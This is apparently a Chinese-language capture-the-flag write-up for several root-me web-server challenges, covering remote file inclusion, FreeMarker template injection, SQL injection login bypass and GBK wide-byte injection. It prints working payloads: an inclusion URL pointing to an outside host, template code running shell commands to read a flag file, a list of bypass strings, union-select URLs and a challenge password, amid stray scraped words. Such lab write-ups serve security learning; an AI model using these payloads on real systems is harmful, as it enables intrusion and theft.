root-me web server 20-30 writeup

Remote File Inclusion-远程文件包含

Get the PHP source code.php

ctrl+uhtml

进行RFI攻击须要同时具有三个条件(被攻击机器):web

allow_url_fopen = On (默认开启)sql

allow_url_include = On (默认关闭)服务器

被包含的变量前没有目录的限制ide

<?php
$filename = $_GET['file']; //将参数file的值传送给变量filename
include($filename); //使用include()函数包含变量
?>函数

view-source:http://challenge01.root-me.org/web-serveur/ch13/?lang=http://7xspti.com2.z0.glb.clouddn.com/123url

Server-side Template Injection-服务器端模板注入

Java EE.net

Exploit the vulnerability in order to retrieve the validation password in the file SECRET_FLAG.txt.code

参考资料

对输入过滤不严格

${2*3}

说明执行了

参考资料

<#assign ex="freemarker.template.utility.Execute"?new()>
${ ex("ls -l") }

找目录SECRET_FLAG.txt

查看选中部分源码

<#assign ex="freemarker.template.utility.Execute"?new()>
${ ex("cat ../SECRET_FLAG.txt") }

SQL injection - authentication

Retrieve the administrator password

ctrl+u

使用万能密钥

admin' --

admin' #

admin'/*

admin' or '1'='1

admin' or '1'='1'--

admin' or '1'='1'#

admin' or '1'='1'/*

密码123456

ctrl+u

type="password" value="t0_W34k!$"

SQL injection - authentication - GBK

宽字节注入

参考资料

http://challenge01.root-me.org/web-serveur/ch42/index.php?id=1%bf%5c%27

http://leettime.net/sqlninja.com/tasks/mics_ch6.php?id=1%bf%5c'
http://leettime.net/sqlninja.com/tasks/mics_ch6.php?id=1%af%5c'Union(select(1),2,3,4,5,6,7,8)%23
http://leettime.net/sqlninja.com/tasks/mics_ch6.php?id=1%af%5c'Union(select(1),version(),3,4,5,6,7,8)%23

SQL injection - string-字符型注入

Retrieve the administrator password

http://challenge01.root-me.org/web-serveur/ch19/?action=news&news_id=1
正常
http://challenge01.root-me.org/web-serveur/ch19/?action=news&news_id=1'
报错

𖠂’ OR 1=1 /*

SELECT * FROM test WHERE name = '𖠂’ OR 1=1 /*’ LIMIT 1

欢迎访问个人独立博客:joy_nick

相关文章
相关标签/搜索